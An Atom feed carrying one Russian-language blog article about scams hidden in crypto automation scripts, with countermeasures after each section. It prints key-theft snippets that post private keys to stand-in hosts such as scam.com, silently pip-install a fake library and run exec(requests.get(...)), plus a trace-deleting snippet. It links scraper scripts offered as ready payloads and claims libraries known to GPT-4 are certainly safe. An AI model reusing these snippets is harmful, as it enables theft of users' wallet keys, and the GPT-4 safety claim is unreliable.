<?xml version="1.0" encoding="utf-8" ?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:tt="http://teletype.in/" xmlns:opensearch="http://a9.com/-/spec/opensearch/1.1/"><title>NET RUNNER</title><author><name>NET RUNNER</name></author><id>https://teletype.in/atom/brokeboi</id><link rel="self" type="application/atom+xml" href="https://teletype.in/atom/brokeboi?offset=0"></link><link rel="alternate" type="text/html" href="https://teletype.in/@brokeboi?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=brokeboi"></link><link rel="next" type="application/rss+xml" href="https://teletype.in/atom/brokeboi?offset=10"></link><link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></link><updated>2026-04-18T09:24:11.526Z</updated><entry><id>brokeboi:dsxymHafdZb</id><link rel="alternate" type="text/html" href="https://teletype.in/@brokeboi/dsxymHafdZb?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=brokeboi"></link><title>Скажи &quot;НЕТ&quot; скаму в софтах!</title><published>2024-01-24T02:21:21.396Z</published><updated>2024-01-24T15:15:12.613Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img1.teletype.in/files/8f/92/8f922ac4-f325-4461-b49e-cc80dc65b1ef.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img3.teletype.in/files/ee/16/ee16adf0-3e17-4186-b4c9-2613558252a4.png&quot;&gt;Привет всем! С вами ваш преданный Not-so-BrokeBoy, ведущий канала Bubble[crypto], сегодня я буду рассказывать как же не пасть жертвой скама, а конкретно скама при запуске кода. Ты можешь крутить очередной проектик, и даже не подозревать, что спинка твоя уже давно покрыта плотным рыжем хутром и ты на самом-то деле уже готов к новому леднековому периоду...</summary><content type="html">
  &lt;p id=&quot;4jew&quot;&gt;Привет всем! С вами ваш преданный &lt;a href=&quot;https://t.me/PaIyanytsya&quot; target=&quot;_blank&quot;&gt;Not-so-BrokeBoy&lt;/a&gt;, ведущий &lt;s&gt;к&lt;/s&gt;анала &lt;a href=&quot;https://t.me/CryptoBub_ble&quot; target=&quot;_blank&quot;&gt;Bubble&lt;/a&gt;[crypto], сегодня я буду рассказывать как же не пасть жертвой скама, а конкретно скама при запуске кода. Ты можешь крутить очередной проектик, и даже не подозревать, что спинка твоя уже давно покрыта плотным рыжем хутром и ты на самом-то деле уже готов к новому леднековому периоду...&lt;/p&gt;
  &lt;p id=&quot;p7vs&quot;&gt;Все вы тут знакомы с концептом айсберг-видео, я даже обяснять не буду лучше посмотри на то, какую я картинку делал целых 10 минут (шок):&lt;/p&gt;
  &lt;figure id=&quot;MSpz&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/ee/16/ee16adf0-3e17-4186-b4c9-2613558252a4.png&quot; width=&quot;1080&quot; /&gt;
    &lt;figcaption&gt;Перешли эту статью 7 друзьям, закрой глаза, хлопни 3 раза, и тогда тебе насыпет леерзира&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;QZoS&quot;&gt;Ну, знаешь да, пословицу про айсберг, что видно только верхушку, все остальное под водой, бла-бла-бла. Именно так и затонул Титаник. Чем ниже ты будешь листать, тем менее очевидными методы будут. Для удобности я классифицировал их по рангу потенциальной опасности. Абзац о каждом виде скамчика будет содержать контрметод по его отлову и удалению. Это как бы цель этой статьи.&lt;/p&gt;
  &lt;p id=&quot;vXor&quot;&gt;Хотя каждый из вас волен определять ее назначение для себя лично. Для одних она станет первым уроком как делать быстрые деньги, для других — как не потерять уже накопленные.&lt;/p&gt;
  &lt;p id=&quot;8vXy&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;axfW&quot; data-align=&quot;right&quot;&gt;&amp;quot;Прокрут&amp;quot; аккаунтов&lt;/h2&gt;
  &lt;p id=&quot;C8zt&quot;&gt;Вершина айсберга с названием &amp;quot;Купить прокрут аккаунтов&amp;quot;. Такие ребята, как IDO-research, Fack-Block, Swiper уже отличились тем, что вместо продажи какого-то там кода, стали сразу продавать &amp;quot;прокрут&amp;quot; (на хую, лол) ваших кошельков. Давайте сразу определимся: хоть я и незнаком с ними, мне не трудно судить о их намерениях. Я вижу шакалов за 16 км, еще до того, как они выйдут из-за горизонта...&lt;/p&gt;
  &lt;p id=&quot;8cnm&quot;&gt;Есть такая пословица: &amp;quot;Not your key — not your money&amp;quot;, тут она работает лучше всего. Для самых маленьких сейчас объясню почему это хуевая идея. Давайте на минуту представим, что все эти &amp;quot;люди&amp;quot; на самом деле оказались праведнымии ничего с вас не возьмут. НО есть одно очень большое &amp;quot;НО&amp;quot; — кто конструировал эти системы прокрута? Думаешь, они тоже честные? Или какой-то кодер-второкурсник, которому платили 1к в месяц, откажется от пары лишних миллионов?&lt;/p&gt;
  &lt;p id=&quot;MWqD&quot;&gt;Не обманывай себя, в нашей с вами индустрии люди сделают все ради профита, и я имею в виду все. Вероятно, один умник уже вмонтировал в этот прокрут бекдорчик и сидит на горе из ключей, считая миллионы. Да даже если нет, камон, что мешает в день дропа резко изменить условия сделки на 30% от токенов? А ведь это будет предложение, от которого невозможно отказаться.&lt;/p&gt;
  &lt;p id=&quot;QkjU&quot;&gt;Тебе самому решать кого ты будешь кормить карбонарой, себя, или очередного шакала?&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h3 id=&quot;SOrN&quot;&gt;&lt;strong&gt;Контрмеры: &lt;/strong&gt;&lt;/h3&gt;
    &lt;p id=&quot;xfeY&quot;&gt;Прокачка IQ до 45 поинтов и работа над наивностью.&lt;/p&gt;
  &lt;/section&gt;
  &lt;p id=&quot;kikw&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;2sj7&quot; data-align=&quot;right&quot;&gt;.exe файлы и закрытый код&lt;/h2&gt;
  &lt;p id=&quot;gsLX&quot;&gt;Уже немножко глубже, чем добровольная передача ключей авторитетам, но все еще на поверхности. Этот раздел будет коротким.&lt;/p&gt;
  &lt;p id=&quot;Y0AS&quot;&gt;Обычно вирусы, трояны и прочее реально фильтруются Windows Firewall&amp;#x27;ом (хоть что-то эти подонки сделали как надо). В случае же со стиллерами так не выйдет, ибо в их наборе инструменты обычно базовые функции системы. В зависимости от &amp;quot;скрипта&amp;quot;, он может и не требовать приватников для работы, но будь уверен, он обязательно их получит. Мой товарищ по несчастью почти попался на подобное. Подцепил какой-то мусор (реально мусор) и почти заскамился. Принцип работы этой проги был очень простой: интегрироваться в систему &amp;gt; сканировать буфер обмена &amp;gt; менять любой адрес на адрес скамера.&lt;/p&gt;
  &lt;p id=&quot;USBH&quot;&gt;Методика крайне глупа и доказала свою неэффективность, ибо первая же подмена была обнаружена, а компьютер почищен. Вообщем, я бы сделал лучше.&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h3 id=&quot;9uDg&quot;&gt;&lt;strong&gt;Контрмеры:&lt;/strong&gt;&lt;/h3&gt;
    &lt;p id=&quot;E0Cw&quot;&gt;&lt;strong&gt;Не &lt;/strong&gt;запускать .exe файлы с непровернных источников, ни в коем случае не давать админку для установки. &lt;/p&gt;
    &lt;p id=&quot;Ncvg&quot;&gt;Для совсем отчаявшихся, можно запустить файл на VM с одним кошельком и прослушивать все совершенные запросы, после чего инспектить уже их. В целом, эффективная тактика, если ты в этом разбираешься.&lt;/p&gt;
  &lt;/section&gt;
  &lt;p id=&quot;R2sm&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;i4dJ&quot; data-align=&quot;right&quot;&gt;Requests scam&lt;/h2&gt;
  &lt;p id=&quot;qda6&quot;&gt;Популярная схема как бы — берем ключи юзера &amp;gt; пакуем в сэт &amp;gt; отправляем себе &amp;gt; богатеем. &lt;/p&gt;
  &lt;p id=&quot;r3tS&quot;&gt;Этот раздел ниже поверхности и тому есть причины, несмотря на очевидность — плохие парни (да и девушки) имеют на руках целый арсенал для маскировки передачи ключей. Рассмотрим несколько примеров:&lt;/p&gt;
  &lt;ul id=&quot;kcUS&quot;&gt;
    &lt;li id=&quot;fnkh&quot;&gt;Маскировка URL&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre id=&quot;pPGT&quot; data-lang=&quot;python&quot;&gt;import requests
import base64

encoded_url = &amp;quot;aHR0cDovL21hbGljaW91cy1zaXRlLmNvbQ==&amp;quot;
decoded_url = base64.b64decode(encoded_url).decode(&amp;#x27;utf-8&amp;#x27;)
requests.post(decoded_url, data={&amp;#x27;key&amp;#x27;: &amp;quot;secret_key&amp;quot;})&lt;/pre&gt;
  &lt;ul id=&quot;W8AP&quot;&gt;
    &lt;li id=&quot;b42g&quot;&gt;Маскировка переменной ключа&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre id=&quot;4hkd&quot; data-lang=&quot;python&quot;&gt;with open(&amp;quot;private_key.txt&amp;quot;, &amp;quot;r&amp;quot;) as file:
    private_key = file.read().strip()

idijxue = &amp;#x27;&amp;#x27;.join([&amp;quot;p&amp;quot;, &amp;quot;r&amp;quot;, &amp;quot;i&amp;quot;, &amp;quot;v&amp;quot;, &amp;quot;a&amp;quot;, &amp;quot;t&amp;quot;, &amp;quot;e&amp;quot;, &amp;quot;_&amp;quot;, &amp;quot;k&amp;quot;, &amp;quot;e&amp;quot;, &amp;quot;y&amp;quot;])

requests.post(&amp;quot;http://scam.com/&amp;quot;, globals()[idijxue])&lt;/pre&gt;
  &lt;p id=&quot;uSiv&quot;&gt;Теперь добавь к этому что строчки могут быть разбросанны по всей директории, переименованны тысячу раз, etc. &lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h3 id=&quot;BS7O&quot;&gt;&lt;strong&gt;Контрмеры:&lt;/strong&gt;&lt;/h3&gt;
    &lt;p id=&quot;UV35&quot;&gt;Поиск по всей директории проекта (Ctrl+Shift+F), затем аудит на предмет того, где, когда и куда передаются ключи/файлы с ними. В случае вопросов — подозрительные фрагменты следует обсудить с GPT-4. Что искать? Вот тебе чеклист:&lt;/p&gt;
  &lt;/section&gt;
  &lt;ul id=&quot;H8Y9&quot;&gt;
    &lt;li id=&quot;SvBR&quot;&gt;Название .txt, .xlsx файла/файлов с ключами&lt;/li&gt;
    &lt;li id=&quot;2WTT&quot;&gt;Название переменной которая присваивается ключам (как пример p_key)&lt;/li&gt;
    &lt;li id=&quot;6e4P&quot;&gt;Фрагменты URL а конкретно этот &amp;quot;://&amp;quot; &lt;/li&gt;
    &lt;li id=&quot;Htt8&quot;&gt;Названия методов &amp;quot;join&amp;quot;, &amp;quot;with open&amp;quot;, &amp;quot;decode&amp;quot;, &amp;quot;requests&amp;quot;&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;JyQ9&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;8NZJ&quot; data-align=&quot;right&quot;&gt;&lt;strong&gt;Фейк либы&lt;/strong&gt;&lt;/h2&gt;
  &lt;p id=&quot;q8u4&quot;&gt;Вот тут уже начинается интересная часть.&lt;/p&gt;
  &lt;p id=&quot;gVdR&quot;&gt;Иногда в requirements.txt могут подложить либу &lt;code&gt;scam-sdk==v13.37&lt;/code&gt; — это все еще топорный метод, но иногда он работает из-за невнимательности пользователя. Как это работает — вопрос десятый; как вариант, похищение ключей, таблиц, сессий браузера, кукисов etc. Короче все что может как-либо обогатить скамера.&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h3 id=&quot;6MdF&quot;&gt;&lt;strong&gt;Контрмеры:&lt;/strong&gt;&lt;/h3&gt;
    &lt;p id=&quot;3QUl&quot;&gt;Аудит импорта с помощью GPT4. А как? Смотри ниже:&lt;/p&gt;
  &lt;/section&gt;
  &lt;p id=&quot;iDyb&quot;&gt;Нам понадобится — скопировать содержимое файла requirements.txt &amp;gt; скинуть все это в GPT-4, добавив вопрос: &amp;quot;Are these libs legit?&amp;quot; В ответе будет описание каждой из библиотек в соответствии c названиями. Если оно есть — done, legit.&lt;/p&gt;
  &lt;p id=&quot;e9IF&quot;&gt;Логика тут проста: если либа достаточно известна для того, чтобы попасть в тренировочный сэт GPT, она на 100% не содержит скама.&lt;/p&gt;
  &lt;p id=&quot;d0VZ&quot;&gt;Если в ответ ты не получаешь описания, это повод &lt;strong&gt;насторожиться&lt;/strong&gt;, но не повод клеймить автора скамером. Многие используют кастомные библиотеки по типу &lt;a href=&quot;https://github.com/alenkimov/better_automation&quot; target=&quot;_blank&quot;&gt;better_automation&lt;/a&gt;, которые GPT не известны, но не менее легитимны. К слову, такое происходит довольно редко.&lt;/p&gt;
  &lt;p id=&quot;OJqB&quot;&gt;Твои действия в таком случае: Вбиваешь в гугол &amp;quot;{название библиотеки} GitHub&amp;quot; &amp;gt; по первой же ссылке попадаешь на её страницу &amp;gt; приступаешь к осмотру пациента. Список вещей, на которые &lt;strong&gt;нужно &lt;/strong&gt;обратить внимание:&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(323, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;LtN7&quot;&gt;Рэдфлаги:&lt;/p&gt;
    &lt;p id=&quot;UuYA&quot;&gt;• Библиотека имеет 0 звезд&lt;br /&gt;• Единственный коммит акаунта — эта библиотека&lt;br /&gt;• Наличие только одной версии (как правило финальной) &lt;br /&gt;• Профилю меньше недели&lt;/p&gt;
    &lt;p id=&quot;2phJ&quot;&gt;Чуть менее красные рэдфлаги:&lt;/p&gt;
    &lt;p id=&quot;iWfD&quot;&gt;• Профиль создавший либу её единственный контрибютор&lt;br /&gt;• Не имеет никакой лицензии&lt;br /&gt;• Нет открытых/закрытых issue тикетов&lt;br /&gt;• Отсутствие README&lt;/p&gt;
  &lt;/section&gt;
  &lt;p id=&quot;1C7t&quot;&gt;Для меня даже один редфлаг — мгновенный скип и закрытие страницы. Либам, которые попадают только во второй список, обычно стоит дать шанс и посмотреть на код. Пора двигаться дальше. К более хитровыебанным способам впихнуть таки &lt;code&gt;scam-sdk==v13.37&lt;/code&gt; в код, минуя файл requirements.txt.&lt;/p&gt;
  &lt;p id=&quot;RZdc&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;bCLk&quot; data-align=&quot;right&quot;&gt;Динамический импорт&lt;/h2&gt;
  &lt;p id=&quot;Mwzb&quot;&gt;Если кратко то Python умеет и так, язык в целом умеет очень много, люблю душить гадюку если вы понимаете о чем я. &lt;/p&gt;
  &lt;p id=&quot;XYCv&quot;&gt;Вот они три вестника обнуления: &lt;code&gt;os, importlib, subprocess.&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;C4rI&quot;&gt;Что, как, почему. В место пихания &lt;code&gt;scam-sdk==v13.37&lt;/code&gt; прямо под нос пользователю, мышенок гарантированно будет устанавливать либу внутри самого кода. Так же в гадюке есть методы подавления вывода информации в терминал. Так что видно ничего не будет, но что я расказываю, перейдем к примерам&lt;/p&gt;
  &lt;p id=&quot;bZ8X&quot;&gt;С помощью &lt;code&gt;os&lt;/code&gt; :&lt;/p&gt;
  &lt;pre id=&quot;lLmU&quot; data-lang=&quot;python&quot;&gt;import os
import importlib

lib_name = &amp;quot;scam-sdk==v13.37&amp;quot;
os.system(f&amp;quot;pip install {lib_name} &amp;gt;nul 2&amp;gt;&amp;amp;1&amp;quot;)
scam = importlib.import_module(lib_name)
scam.steal_key&lt;/pre&gt;
  &lt;p id=&quot;yaQd&quot;&gt;С помощью&lt;code&gt;subprocess&lt;/code&gt; :&lt;/p&gt;
  &lt;pre id=&quot;GFxE&quot; data-lang=&quot;python&quot;&gt;import subprocess
import sys
import importlib

lib_name = &amp;quot;scam-sdk==v13.37&amp;quot;
subprocess.run(
    [sys.executable, &amp;#x27;-m&amp;#x27;, &amp;#x27;pip&amp;#x27;, &amp;#x27;install&amp;#x27;, lib_name],
    stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT
)
scam = importlib.import_module(lib_name)
scam.steal_key&lt;/pre&gt;
  &lt;p id=&quot;Q9nf&quot;&gt;Подобными финтами можно скрытно установить все-что-угодно.py без ведомости самого юзера. &lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h3 id=&quot;gTZk&quot;&gt;&lt;strong&gt;Контрмеры:&lt;/strong&gt;&lt;/h3&gt;
    &lt;p id=&quot;6bzr&quot;&gt;Поиск (Ctrl+Shift+F) двух ключевых слов: &amp;quot;install&amp;quot;, &amp;quot;importlib&amp;quot;. Не смотря на хитровыебаность это легко ищется, такой мув не заметить трудно.&lt;/p&gt;
  &lt;/section&gt;
  &lt;p id=&quot;5l3J&quot;&gt;Подобным способом можно устанавливать еще и C библиотеки, но я далек от эксперта в этом поле, оставлю на подумать. ДумайТЕ.&lt;/p&gt;
  &lt;p id=&quot;nKeQ&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;7mHt&quot; data-align=&quot;right&quot;&gt;&lt;strong&gt;Скам-контракты&lt;/strong&gt;&lt;/h2&gt;
  &lt;p id=&quot;smp9&quot;&gt;Классическая классика. Этого не сделают ваши любимые кодбои, за них это сделает Ваня из 10-Б. Я не шарю за solidity от слова совсем, так что почитай вот &lt;a href=&quot;https://teletype.in/@izidao/u-Q8rLelUbt&quot; target=&quot;_blank&quot;&gt;это&lt;/a&gt;, если хочется немного поумнеть. Все же можно выделить 3 сорта этого дерьма:&lt;/p&gt;
  &lt;ol id=&quot;xAg8&quot;&gt;
    &lt;li id=&quot;5qTh&quot;&gt;Отправка всего что есть на адрес скамера. Найболее тупой метод, по факту это дрейнер который ты же и запускаешь у себя на компутере.&lt;/li&gt;
    &lt;li id=&quot;wNM2&quot;&gt;Апрув всех токенов контракту N. В отличии от первого этот имеет отложенный эфект, может ждать годы пока ты не получишь тот самый дроп на xxxxxx$ чтобы оперативненько тебя от него избавить.&lt;/li&gt;
    &lt;li id=&quot;bzhu&quot;&gt;Подмена легитного контракта копией с расширенным функционалом. Будет делать все тоже самое что и контракт-оригинал + функция scam. &lt;/li&gt;
  &lt;/ol&gt;
  &lt;p id=&quot;rZWS&quot;&gt;Суммарно это найболее заметный и найменее прибыльный из методов. Он отлично сработает если аудитория большая, но на индивидуальном уровне это кринж, советую рассмотреть варианты получше.&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h3 id=&quot;JMgF&quot;&gt;&lt;strong&gt;Контрмеры:&lt;/strong&gt;&lt;/h3&gt;
    &lt;p id=&quot;BeCJ&quot;&gt;Тестовый запуск всех функций скрипта на одном кошельке &amp;gt; проверка каждой транзакции в эксплорере &amp;gt; ручная проверка каждого из контрактов. &lt;/p&gt;
    &lt;p id=&quot;pkMk&quot;&gt;Первое на что стоит обратить внимание это суммарное количество транзакций, ни один скамер не станет накручивать на контракте 50к nonсe для чего бы там ни было, это просто не выгодно.&lt;/p&gt;
    &lt;p id=&quot;TO5E&quot;&gt;Подозрительные контракты стоит проверить через &lt;a href=&quot;https://solidityscan.com/quickscan&quot; target=&quot;_blank&quot;&gt;solidityscan&lt;/a&gt;. &lt;/p&gt;
    &lt;p id=&quot;vI23&quot;&gt;Так же не забудь подключить адрес и проверить все апрувы на &lt;a href=&quot;https://revoke.cash&quot; target=&quot;_blank&quot;&gt;https://revoke.cash&lt;/a&gt; &lt;/p&gt;
    &lt;p id=&quot;Szk8&quot;&gt;Ps. Бесконечные апрувы легитным адресам вроде opensea, uniswap это не признак скама, это повод дать автору леща. Всегда есть вероятность что даже самые крупные компании падут жертвами тир-3 эксплойта. Последнее что тебе нужно это апрув на 59438510341299432308417248528374 ETH &lt;/p&gt;
  &lt;/section&gt;
  &lt;p id=&quot;bVRx&quot;&gt;&lt;/p&gt;
  &lt;p id=&quot;nNPt&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;PWJ9&quot; data-align=&quot;right&quot;&gt;&lt;strong&gt;exec(requests.get(&amp;#x27;&lt;a href=&quot;https://scam.com&quot; target=&quot;_blank&quot;&gt;https://scam.com&lt;/a&gt;&amp;#x27;).text)&lt;/strong&gt;&lt;/h2&gt;
  &lt;p id=&quot;1g15&quot;&gt;&lt;strong&gt;Ужасное название. Не менее ужасающие последствия.&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;1oN5&quot;&gt;Одна строчка, которая подгружает код из хуй-пойми-откуда.com и тут же запускает его. Что может быть внутри? Всё. Что. Угодно... В 9 из 10 случаев это скрипт, который с помощью re ищет строки длиной 64 символа по всей системе, после чего отправляет их на сервер. А ведь искать долго не придется: каждый третий хранит все файлы с ключами в одной папке. Ты даже не представляешь, сколько из вас уже сидит на пороховой бочке. Два огромных плюса в сравнении с остальными методами:&lt;/p&gt;
  &lt;ul id=&quot;ZNm4&quot;&gt;
    &lt;li id=&quot;7xuq&quot;&gt;Не требует сторонних библиотек&lt;/li&gt;
    &lt;li id=&quot;L0j5&quot;&gt;Крадет ключи, а не деньги&lt;/li&gt;
  &lt;/ul&gt;
  &lt;blockquote id=&quot;NFT4&quot;&gt;С 99% вероятностью на твоем пк уже установленна либа requests. Или же ты не заметишь ничего подозрительного в требовании установить ее.*&lt;/blockquote&gt;
  &lt;p id=&quot;GV0G&quot;&gt;Для наглядности я подготовил скрейперы которые избавят мамонтенка от наличия денег/дропа/будущего в течении 1 минуты. Могут послужить начинкой скачиваемого .py кода. Мышке остается только поднять сервачок за 8$ и найти жертву.&lt;/p&gt;
  &lt;p id=&quot;3yzU&quot;&gt;&lt;a href=&quot;https://github.com/Reilighost/scam-examples/blob/main/system-scrape/find-key-system-wide.py&quot; target=&quot;_blank&quot;&gt;Этот&lt;/a&gt; избавляет от наличия ключей в .txt файлах, а &lt;a href=&quot;https://github.com/Reilighost/scam-examples/blob/main/system-scrape/find-xlsx-sistem-wide.py&quot; target=&quot;_blank&quot;&gt;этот&lt;/a&gt; в .xlsx. (Можно добавить удаление найденных ключей для &lt;strong&gt;+ 30 поинтов к моральному урону&lt;/strong&gt;)&lt;/p&gt;
  &lt;p id=&quot;cEDP&quot;&gt;Shit, ты даже не понимаешь насколько это серьезная хуйня. В python, скачиваемый скрипт может запросто удалять любые линии оригинального файла...&lt;/p&gt;
  &lt;pre id=&quot;RVPZ&quot; data-lang=&quot;python&quot;&gt;# Determine the path of the target script
directory = os.path.abspath(os.path.dirname(__file__))
target_script_path = os.path.join(directory, original_script_name)

# Read the original script and identify lines to keep
with open(target_script_path, &amp;#x27;r&amp;#x27;) as file:
     lines = file.readlines()
new_lines = [line for line in lines if &amp;#x27;#DELETE&amp;#x27; not in line]

# Write the modified content back to the script
with open(target_script_path, &amp;#x27;w&amp;#x27;) as file:
     file.writelines(new_lines)
     &lt;/pre&gt;
  &lt;p id=&quot;nE5A&quot;&gt;По факту после первого же запуска следов работы скрипта не останется, а ты будешь сидеть довольный что прокрутил очередную пачку кошельков в проекте Х, ничего не подозревая о произошедшем.&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;XwOv&quot;&gt;Контрится, как всегда, поиском по ключевому слову (exec) в данном случае. Всегда ищи по всей директории проекта c помощью (Ctrl+Shift+F), чтобы не кликать каждый файл как долбоёб. Функции exec() &lt;strong&gt;не должно быть в принципе&lt;/strong&gt;. Запомни, она используется только для динамических алгоритмов, и её просто не должно быть в скрипте под StarGate с 6 модулями.&lt;/p&gt;
    &lt;p id=&quot;HHOw&quot;&gt;Второй способ — это шифровать все файлы с ключами. Да, это не так удобно, ибо к любому скрипту придётся добавлять прокладку для расшифровки. Но опять же, + полминуты к запуску — адекватная цена, если на кону стоит всё твоё состояние. Вот функции для &lt;a href=&quot;https://github.com/Reilighost/scam-examples/blob/main/encryption-tools/encrypt.py&quot; target=&quot;_blank&quot;&gt;шифрования&lt;/a&gt; и &lt;a href=&quot;https://github.com/Reilighost/scam-examples/blob/main/encryption-tools/decrypt.py&quot; target=&quot;_blank&quot;&gt;дешифрования&lt;/a&gt;, рекомендуется дешифровку делать сразу в рабочую память, иначе в этом нет смысла, файлы с ключами должны &lt;strong&gt;всегда&lt;/strong&gt; быть зашифрованы!&lt;/p&gt;
  &lt;/section&gt;
  &lt;p id=&quot;NDFK&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;n9Wv&quot; data-align=&quot;right&quot;&gt;&lt;strong&gt;Key rotation&lt;/strong&gt;&lt;/h2&gt;
  &lt;p id=&quot;BZIr&quot;&gt;Этот раздел не относится к коду, написан исключительно для промоутинга моей прошлой статьи, вот она кстати — &lt;a href=&quot;https://teletype.in/@brokeboi/MwdhHYbh60z&quot; target=&quot;_blank&quot;&gt;статья&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;V9Cb&quot;&gt;Начну из далека, в EVM приватный ключ равен 64 символам, а адрес 32. Не у всех блокчейнов так. Starknet, Sui, Aptos у этих длина приватного ключа == длина адреса. Пополнив ненароком свой приватник — ты навсегда вписываешь его в эксплорер, фактически делая содержимое кошелька общим.&lt;/p&gt;
  &lt;p id=&quot;54V7&quot;&gt;В дополнение к этому в Aptos и Starknet на этом кошельке еще и поменяют приватник на новый, разумеется не полицейские, после чего он уже как бы и не твой будет.&lt;/p&gt;
  &lt;p id=&quot;b3Nj&quot;&gt;Конец.&lt;/p&gt;
  &lt;p id=&quot;qDhg&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;iOUe&quot; data-align=&quot;right&quot;&gt;S+ tier&lt;/h2&gt;
  &lt;p id=&quot;b9NU&quot;&gt;Ха! Ты, наверное, подумал, что тут будут ультимативные методики по обогащению, да? Что я буду рассказывать о всяких хакерских штукенциях... К сожалению, нет. Приемы из этого раздела слишком опасны для того, чтобы о них знать, даже в учебных целях. Этот уровень — чистое зло. Вот некоторые проги что есть у меня: &lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(323, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;ul id=&quot;DycC&quot;&gt;
      &lt;li id=&quot;76Qb&quot;&gt;Программы, маскирующиеся под другие .exe файлы, заменяя собой ярлык условного PyCharm, выпрашивают при запуске админку и ...&lt;/li&gt;
    &lt;/ul&gt;
    &lt;ul id=&quot;x8rN&quot;&gt;
      &lt;li id=&quot;PWyJ&quot;&gt;Программы, создающие 1.6к картинок Pepe-the-Frog в секунду по всей системе. Альтернативно просто пустые файлы 2 сотен разных типов (.bat, .html, .waw, etc). Уже спустя 30 секунд работы очистить систему от этого будет невозможно.&lt;/li&gt;
      &lt;li id=&quot;0Wr6&quot;&gt;Программы, которые бесконечно перезаписывают кластеры SSD, пока тот не выйдет из строя.&lt;/li&gt;
      &lt;li id=&quot;hjMl&quot;&gt;Ну и, конечно же программы, обеспечивающие удаленный доступ, куда же без этого. Тут и обьяснять не нужно, + одна пара глаз смотрит через вэбку.&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/section&gt;
  &lt;p id=&quot;9VIl&quot;&gt;Когда я начал учить Python да и кодинг в целом, у меня было стойкое ощущение, что можно сделать алгоритм для всего, что любая идея, даже самая безумная —может быть воплощена, и более того, будет работать. По итогам я не ошибся: в мире кода может быть реализовано виртуально все что угодно, поэтому S+ насчитывает сотни, если не тысячи, различных эксплойтов. Описать их все невозможно, да и защититься тоже. Просто держи в уме, что какими бы крутым ты ни был — всегда найдется рыба покрупнее.&lt;/p&gt;

</content></entry></feed>